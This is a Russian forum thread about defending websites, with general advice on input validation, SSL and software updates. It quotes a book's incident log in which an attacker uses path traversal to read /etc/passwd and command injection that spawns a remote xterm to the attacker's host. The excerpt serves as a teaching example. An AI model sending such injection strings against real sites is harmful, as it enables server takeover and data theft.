1 / 1 / 5
Регистрация: 25.04.2010
Сообщений: 121

Защита сайта от хакеров (поделитесь скриптами)

29.04.2011, 02:52. Показов 8207. Ответов 31
Метки нет (Все метки)

Студворк — интернет-сервис помощи студентам
Собираю щас информацию по защите сайтов.
Вот самые известные приемы защиты:
1. Авторизация, регистрация;
2. Cookie;
3. Ведение логов;
4. Использование шифрования данных, типа SSL.
ну и т.п.
Можете поделиться своим опытом защиты (взлома). Каким образом юзерам удавалось проникнуть в базу или код? И если у кого-то завалялся код для определенной защиты сайта... может от флуда, выложите плз. Зараннее всем спасибо.
0
IT_Exp
Эксперт
34794 / 4073 / 2104
Регистрация: 17.06.2006
Сообщений: 32,602
Блог
29.04.2011, 02:52
Ответы с готовыми решениями:

Защита от хакеров?
Здравствуйте! Хочу спросить :) Мои страницы принимают какие-то значения из адресной строки. Как можно определить, что там не были...

Защита программы от знакомых хакеров
Как можно реализовать экстренное закрытие игры при появлении в любом приложении слова installsoft или клевалка? Надеюсь install с...

Взаимодействовать со скриптами сайта из расширения
Всем привет) Нужна помощь гуру в вопросе из названия) Пишу простенькое расширение, которое загружает js код в страницу по нажатию кнопки....

31
twister
29.04.2011, 11:43
Лучше всего использовать внутренние возможности сервака.
Я например использую SSL+Apache.
Причем директории, закрытые которые, как обычно под .htpasswd.

Вообще защита сайта - скорее дело админа сервака, чем девелопера
1 / 1 / 5
Регистрация: 25.04.2010
Сообщений: 121
29.04.2011, 19:20  [ТС]
Согласен, это дело больше касается админа сервака. Но иногда приходится аккуратно писать код.
Часты случаи взлома через POST/GET данные. Поэтому нужно критически относится к принятым данным и на всякий случай проверить правильность их ввода.
0
twister
29.04.2011, 22:03
Мне кажется, что просто необходимо писать такие приложения, которые бы не зависелы в принципе (безопасность) от данных пользователя.
Хотя, наверно, это полностью невозможно
1 / 1 / 5
Регистрация: 25.04.2010
Сообщений: 121
30.04.2011, 10:28  [ТС]
Да, такие приложения будут абсолютно статическими
Если посмотреть местоположение данных, которыми обмениваются сервер и клиент, то у них 3 положения:
1. Сторона клиента.
2. Канал связи.
3. Сторона сервера.
Степень легкости взлома на разных уровнях разная и сложно сказать, какие данные легче заполучить
0
1 / 1 / 5
Регистрация: 25.04.2010
Сообщений: 121
01.05.2011, 12:54  [ТС]
Вобщем, я понял! Для того, чтобы полностью защитить свой сайт от хакеров нужно:
1. Стараться не использовать Cookie, в противном случае хранить там закодированную информацию;
2. Аккуратно использовать URL для передачи параметров и предусмотреть проверку данных на допустимые значения, также проверять POST данные;
3. Посылать данные серверу через защищенный канал (SSL);
4. Использовать регистрацию, аутенфикацию пользователей, а также ведение истории (логов);
5. Важную информацию в базе данных хранить в шифрованном виде;
6. Использовать файлы .htaccess и .htpasswrd для определенных папок;
7. Для запрещенных просмотру страниц добавить HTTP аутенфикацию;
и еще много куча всего предусмотреть...
можно с ума сойти, обращая особое внимание безопасности, так несложно и самому хакером стать
0
1 / 1 / 5
Регистрация: 25.04.2010
Сообщений: 121
05.05.2011, 02:39  [ТС]
Для тех, кому интересно! Из книги 'Хакинг в web' (много авторов).
31 окт. 2001 года оказался плохим днем для нового web-узла компании Acme www.acme-art.com. Взломщик похитил номера кредитных карточек из базы данных интерактивного магазина компании и разместил их в группе новостей Usenet. Электронные средства передачи информации работали быстро и безжалостно, и в течение нескольких часов компания потеряла сотни тысяч долларов заказов, приобрела плохую репутацию, но самое главное в том, что теперь ей придется снова накапливать капитал. Руководитель информационной службы компании озадачен. Где была допущена ошибка в процессе очередной проверки безопасности системы? Казалось, все в порядке. Брандмауэры блокировали весь трафик, за исключением портов 80 и 443. Подробно расследуя инциндент, группа экспертов обнаружила в системном журнале web-сервера следующие данные:

10.0.1.21 - - [31/Okt/2001:03:02:47 +0530] 'GET / HTTP/1.0' 200 3008
10.0.1.21 - - [31/Okt/2001:03:02:47 +0530] 'GET /yf_thumb.jpg HTTP/1.0' 200 3452
10.0.1.21 - - [31/Okt/2001:03:02:47 +0530] 'GET /fl_thumb.jpg HTTP/1.0' 200 8468
10.0.1.21 - - [31/Okt/2001:03:02:47 +0530] 'GET /th_thumb.jpg HTTP/1.0' 200 6912
10.0.1.21 - - [31/Okt/2001:03:02:47 +0530] 'GET /mn_thumb.jpg HTTP/1.0' 200 7891

10.0.1.21 - - [31/Okt/2001:03:03:13 +0530] 'GET /index.cgi?page=falls.shtml HTTP/1.0' 200 610
10.0.1.21 - - [31/Okt/2001:03:03:13 +0530] 'GET /falls.jpg HTTP/1.0' 200 52640
10.0.1.21 - - [31/Okt/2001:03:03:18 +0530] 'GET /index.cgi?page=tahoel.shtml HTTP/1.0' 200 652
10.0.1.21 - - [31/Okt/2001:03:03:18 +0530] 'GET /tahoel.jpg HTTP/1.0' 200 36580

10.0.1.21 - - [31/Okt/2001:03:03:41 +0530] 'GET /cgi-bin/ HTTP/1.0' 403 272

10.0.1.21 - - [31/Okt/2001:03:04:10 +0530] 'GET /index.cgi HTTP/1.0' 200 3008
10.0.1.21 - - [31/Okt/2001:03:05:31 +0530] 'GET /index.cgi?page=index.cgi HTTP/1.0' 200 358

10.0.1.21 - - [31/Okt/2001:03:06:21 +0530] 'GET /index.cgi?page=/../../../../../../../../../etc/passwd HTTP/1.0' 200 723

10.0.1.21 - - [31/Okt/2001:03:07:01 +0530] 'GET /index.cgi?page=|ls+-la/%0aid%0awhich+xterm| HTTP/1.0' 200 1228
10.0.1.21 - - [31/Okt/2001:03:17:29 +0530] 'GET /index.cgi?page=|xterm+-display+10.0.1.21:0.0+%26| HTTP/1.0' 200

Надеюсь все понятно. Взлом был произведен через всего лишь http протокол.
0
4 / 4 / 3
Регистрация: 25.05.2009
Сообщений: 2,576
05.05.2011, 10:39
уверяю тебя, нет такого сайта, который не сможет взломать не один взломщик, и нет такого взломщика, который смог бы взломать все сайты.
Иными словами - на каждого умного найдётся кто-то умнее!
А всё, что ты писал выше - это познаётся в практике.
0
86 / 62 / 69
Регистрация: 15.03.2007
Сообщений: 6,903
05.05.2011, 10:56
Согласен с sl_play.

То что возможен влом сайта только через http никого не удивищь. Этот пример лишний раз подтверждает что нужно проверять данные полученные от пользователя.
0
1 / 1 / 5
Регистрация: 25.04.2010
Сообщений: 121
05.05.2011, 18:44  [ТС]
HTTP это только одна из дыр WEB, а их огромное множество, и естественно все нельзя усмотреть при разработке сайта. Целью было узнать от Вас какой-нибудь опыть, проверенный на личной шкуре, чтобы дальнейшие разработчики проектов не делали элементарных дыр. Видимо основных вопров безопасности всем достаточно.
Всем спасибо!
0
4 / 4 / 3
Регистрация: 25.05.2009
Сообщений: 2,576
06.05.2011, 10:57
повторюсь - только с практикой ты поёмешь через какие дыры тебя могут взломать, а знаешь почему только с практикой?
Даже если тебе сейчас объяснят как делать дос-атаку ты всё равно не поймёшь как от неё защититься.
Чтобы знать как сломать, нужно построить, и построить не один раз, тогда ты поймёшь как это что ты построил ломать!
0
0 / 0 / 1
Регистрация: 14.02.2009
Сообщений: 470
07.05.2011, 14:46
Сделай сайт типа <title>'Тут лежат бабки'</title> и так далее. Пропиши его везде и набирайся опыта
0
4 / 4 / 3
Регистрация: 25.05.2009
Сообщений: 2,576
07.05.2011, 15:14
:-)
0
0 / 0 / 0
Регистрация: 24.01.2012
Сообщений: 8
24.01.2012, 16:33
Вообще, сайты счас довольно часто ломаются через web. ssl дает всего лишщь защиту от снифинга, и, иногда, частично от фишинга.
Проблеммы серъедные, но не единственые.
И за настройку сервер отвечает действительно алдмин, так как он настраивает сервер.
Но вот только программист отвечает на наличие дыр в написанных скриптах. Так как именно он пишет скрипты. А знающий хакер сможет найти эти дыры и получить котроль над сайтом, даже в сулчае если он не знает исходников скриптов.
Выходом в такой ситуации модет стать наем грамотного специалиста (которого тяжело найти, и которому надо платить много денег), либо заказ аудита информационной безопасности у профессионалов, например тут: http://www.web-security.ru/
кроме того, они могут провести и бесплатный аудит: http://www.web-security.ru/freeaudit.html
0
7 / 8 / 6
Регистрация: 11.05.2008
Сообщений: 876
26.01.2012, 01:57
Не используйте софт, который юзается на тысячах сайтов, как то: phpbb, phpnuke итп. Пишите свой...
0
0 / 0 / 0
Регистрация: 24.01.2012
Сообщений: 8
26.01.2012, 16:59
Отказ от использования бесплатных (никем не проверенных на безопасность) даст гарантию от взлома скрипт киддисами, после обнародоваиня информации о найденных уязвимостях в этих системах. (кстати, такого же результата пожно добиться периодически обнволяя акой софт).
На даже в самописном софте, вероятно (и более вероятнее чем в бесплатном), будут дыры, которые сможет найти более или менее умелый хакер. И тут уже стоит полагаться только на компетенцию программиста.
Нередко, фирмы узнают что о безопасности сайта также необходимо заботиться, только тогда, когда их сайт оказывается задефейсен а вся информация перетекает конкурентам..
0
0 / 0 / 0
Регистрация: 24.01.2012
Сообщений: 8
26.01.2012, 17:00
Кстати по статистике более половины сайтов имеют уязвимости разной степени критичности.
Так что, даже этот сайт с вероятностью 50% имеет дыры
0
7 / 8 / 6
Регистрация: 11.05.2008
Сообщений: 876
30.01.2012, 13:13
Никто и не спорит. Но одно дело - взлом при наличии кода, второе - взлом по черному ящику. Просто был прецедент, что исследуя очередную дыру в phpNuke, наткнулся на еще несколько до сих пор не опубликованных серьезных уязвимостей
0
0 / 0 / 0
Регистрация: 24.01.2012
Сообщений: 8
30.01.2012, 17:36
Согласен....
Но следует учесть что сейчас, де факто сложилась следжующая обстановка.
популярные свободные движки (phpBB и тп), уже сильно перелатаны, и найти самостоятельно в них дыру (слледую код или блекбокс тестируя), оченеь тяжело. И по этому если хакер будет взламывать какой то сайт и увидет на нем одну из свободных систем, он в первую очередь посмотрит известные (на паблике либо приватные) уязвимости в системе и использует их. А, публично известные уязвимости как правило оказываются быстро пофиксины производителем. Искать же новые дыры хакер скорее всего не станет, так как взлом получиться нецелесообразным (для большинства средних сайтов). Так что в большинстве случаев достаточно периолдически обновлять свободное ПО. Учитывая частые случаи масс-дефесов, обновлять его желаетльно в день опубликования информации о уязвимости. то есть следить за новостями.
А вот на крупных сайтах, которые получат значительный ущерб в случе взлома - компрометации (процессинговые центры, онлайн банкинг и тп), очевидно импользование такого ПО не желательно.
Опять вернемся к среднему корпаративному сайту или интернет магазину. допустим хакер обноружил на нем свежую версию открытого движка (PHPBB к примеру). искать уязвимости в PHPBB он не станет. Более вероятно он станет исследовать самописные скрипты системы и подсистемы. Так как именно в таких частях неиоболее вероятны критические ошибки бещопасности.
И тут уже каждая компания должна для себя сделать вывод. Что будет наиболее целесообразно.
1) оставить сайт незащищенным (потенциально нещзащищенным)
2) нанять грамтного специалиста.
3) заказать аудит информационной безопасности профессионалам, например хорошо себя зарекомендовали http://www.web-security.ru/ .
В первом случае нудно отдавать себе отчет, что ущер причененный в результате компрометации сайта (а это может быть не банальный дефейс, а кража инфомрации, представляющей коммерческую тайну и перепродажа ее конкурентам, и банальное вымагательство и нарушение работоспособноести сервера, и потеря доверия клинетов)
Во втором случае грамотный специалист может дорого стоить, и найти его тяжело, так же тяжело узнать его компетенцию в этом вопросе.
Третий случай моэжет быть нецелессобразен в случае если необходимо обеспечить безопасность сервера серъедной организации, типа интернет-банкина и тп, В таком именно случае более рахумно нанять специалиста (или адже штат специалистов)
0
0 / 0 / 1
Регистрация: 14.02.2009
Сообщений: 470
31.01.2012, 12:25
Следуя логике выше, я будучи тупым или злым могу написать скрипт, например на уважаемом PHP, через который каждый умный хакер сможет сломать сервер моего провайдера? Вам не кажется, что это нонсенс?
С другой стороны, я действительно могу по недосмотру открыть доступ в пределах выделенной мне под сайт директории (или базы). Это уже мои проблемы (и тех кто доверил мне номера кредитных карточек). Было бы очень любопытно почитать список известных нюансов на тему безопасности, на которые нужно обращать внимание при разработке скриптов (типа "не передавать в поле формы аргументы для функции exec()" и т.п.). Знает кто-нибудь, где можно почитать на эту тему?
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
BasicMan
Эксперт
29316 / 5623 / 2384
Регистрация: 17.02.2009
Сообщений: 30,364
Блог
31.01.2012, 12:25
Помогаю со студенческими работами здесь

Поделитесь докладом по теме защита ПДн для юзозверей
Так получилась что мне &quot;выпала честь&quot; организовать доклад на тему защиты ПДн, для подразделений организации (в основном начальство) по...

Парсинг сайта, если сама страница генерируется скриптами при загрузке
Господа, подскажите новичку, как получить информацию, например с этой страницы, если сама страница генерируется скриптами при загрузке....

Поделитесь исходниками сайта
Доброго времени суток. Люблю начинать изучение чего либо с боевого примера, но перерыл весь интернет, нашёл немного... У кого есть...

Поделитесь опытом в верстке сайта
Доброе время суток. Я только в начале своего пути. Будьте добры посмотрите вёрстку. Что как можно подправить, ошибки. HTML ...

Защита сайта
друзья давайте обсудим как защитить свой сайт


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
20
Ответ Создать тему
Опции темы

Новые блоги и статьи
WordPad для Windows 11
Jel 10.01.2026
WordPad для Windows 11 — это приложение, которое восстанавливает классический текстовый редактор WordPad в операционной системе Windows 11. После того как Microsoft исключила WordPad из. . .
Classic Notepad for Windows 11
Jel 10.01.2026
Old Classic Notepad for Windows 11 Приложение для Windows 11, позволяющее пользователям вернуть классическую версию текстового редактора «Блокнот» из Windows 10. Программа предоставляет более. . .
Почему дизайн решает?
Neotwalker 09.01.2026
В современном мире, где конкуренция за внимание потребителя достигла пика, дизайн становится мощным инструментом для успеха бренда. Это не просто красивый внешний вид продукта или сайта — это. . .
Модель микоризы: классовый агентный подход 3
anaschu 06.01.2026
aa0a7f55b50dd51c5ec569d2d10c54f6/ O1rJuneU_ls https:/ / vkvideo. ru/ video-115721503_456239114
Owen Logic: О недопустимости использования связки «аналоговый ПИД» + RegKZR
ФедосеевПавел 06.01.2026
Owen Logic: О недопустимости использования связки «аналоговый ПИД» + RegKZR ВВЕДЕНИЕ Введу сокращения: аналоговый ПИД — ПИД регулятор с управляющим выходом в виде числа в диапазоне от 0% до. . .
Модель микоризы: классовый агентный подход 2
anaschu 06.01.2026
репозиторий https:/ / github. com/ shumilovas/ fungi ветка по-частям. коммит Create переделка под биомассу. txt вход sc, но sm считается внутри мицелия. кстати, обьем тоже должен там считаться. . . .
Расчёт токов в цепи постоянного тока
igorrr37 05.01.2026
/ * Дана цепь постоянного тока с сопротивлениями и напряжениями. Надо найти токи в ветвях. Программа составляет систему уравнений по 1 и 2 законам Кирхгофа и решает её. Последовательность действий:. . .
Новый CodeBlocs. Версия 25.03
palva 04.01.2026
Оказывается, недавно вышла новая версия CodeBlocks за номером 25. 03. Когда-то давно я возился с только что вышедшей тогда версией 20. 03. С тех пор я давно снёс всё с компьютера и забыл. Теперь. . .
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2026, CyberForum.ru